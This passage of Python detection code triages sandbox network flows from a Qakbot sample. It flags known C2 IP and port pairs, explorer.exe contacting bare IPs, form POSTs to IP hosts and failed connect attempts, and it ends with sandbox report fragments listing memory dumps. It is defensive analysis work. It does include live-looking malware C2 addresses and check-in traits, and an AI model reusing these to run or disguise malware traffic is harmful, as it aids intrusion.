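class Flow:
    dst_ip: str
    dst_port: int
    process: str = ""        # owning process, where the sandbox attributed one
    bytes_out: int = 0
    packets: int = 0
    sni: str = ""            # TLS server name; empty for connections to bare IPs
    http_request: str = ""   # decrypted request head, if one was captured


# Ports this configuration uses (443, 995, 2222, 2078), derived from the list above.
QAKBOT_PORTS = {port for _, port in parse_c2_list(C2_CONFIG)}

# Constructed from the Network list: two benign Windows Update flows and the three kinds
# of explorer.exe flow the page shows (byte and packet counts as reported).
SAMPLE_FLOWS = [
    Flow("52.242.101.226", 443, sni="slscr.update.microsoft.com", bytes_out=1300, packets=12),
    Flow("20.54.110.119", 443, "wuauserv", 2700, 14, sni="tsfe.trafficshaping.dsp.mp.microsoft.com"),
    Flow("97.98.130.50", 443, "explorer.exe", 156, 3),
    Flow("81.250.153.227", 2222, "explorer.exe", 156, 3),
    Flow("136.232.34.70", 443, "explorer.exe", 1900, 11, http_request=QAKBOT_POST),
]


def classify_flow(flow, c2):
    """Return the reasons a flow is suspicious; an empty list means nothing tripped."""
    reasons = []
    if (flow.dst_ip, flow.dst_port) in c2:
        reasons.append("known_c2")
    if flow.process.lower() == "explorer.exe" and not flow.sni and flow.dst_port in QAKBOT_PORTS:
        # explorer.exe has no reason to open TLS sessions to bare IPs on these ports.
        reasons.append("explorer_direct_to_ip")
    if flow.http_request:
        method, _path, hdr = parse_http_request(flow.http_request)
        # A form POST to a bare-IP Host header is how this sample checked in; every
        # legitimate flow on the page carried a hostname.
        if (method == "POST" and is_ipv4(hdr.get("host", ""))
                and hdr.get("content-type", "").startswith("application/x-www-form-urlencoded")):
            reasons.append("form_post_to_bare_ip")
        # Accept header exactly as this one capture sent it (sample-specific, not family-wide).
        if hdr.get("accept", "").startswith("application/x-shockwave-flash"):
            reasons.append("accept_header_matches_sample")
    elif 0 < flow.packets <= 3 and flow.bytes_out < 200:
        # A few packets, under 200 bytes, no application data: an unanswered connection
        # attempt, which the page shows for several of this sample's C2 addresses.
        reasons.append("connect_attempt_only")
    return reasons


def triage(flows, c2):
    """Return [("ip:port", reasons)] for every flow that tripped at least one check."""
    return [(f"{f.dst_ip}:{f.dst_port}", r) for f in flows if (r := classify_flow(f, c2))]
```

Run `triage(SAMPLE_FLOWS, parse_c2_list(C2_CONFIG))` to see the three explorer.exe flows flagged and both Windows Update flows left alone. The behavioural checks (explorer.exe talking straight to an IP on one of the configured ports, the failed-connect shape) are what catch the addresses that are not in the extracted list; the exact C2 match is the cheap confirmation, not the primary signal.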

    MITRE ATT&CK Enterprise v6


    Downloads

    • memory/920-152-0x0000000074A70000-0x0000000074A91000-memory.dmp

      Filesize

      132KB

    • memory/920-154-0x0000000002EF0000-0x0000000002EF1000-memory.dmp

      Filesize

      4KB

    • memory/920-153-0x0000000074A70000-0x000000007547C000-memory.dmp

      Filesize

      10.0MB

    • memory/920-151-0x0000000074A70000-0x000000007547C000-memory.dmp

      Filesize

      10.0MB

    • memory/1872-149-0x000001A23BA10000-0x000001A23BA14000-memory.dmp

      Filesize

      16KB

    • memory/1872-148-0x000001A2394E0000-0x000001A2394F0000-memory.dmp

      Filesize

      64KB

    • memory/1872-147-0x000001A238D60000-0x000001A238D70000-memory.dmp

      Filesize

      64KB

    • memory/4032-157-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

      Filesize

      4KB

    • memory/4032-158-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

      Filesize

      4KB

    • memory/4032-159-0x00000000003C0000-0x00000000003E1000-memory.dmp

      Filesize

      132KB
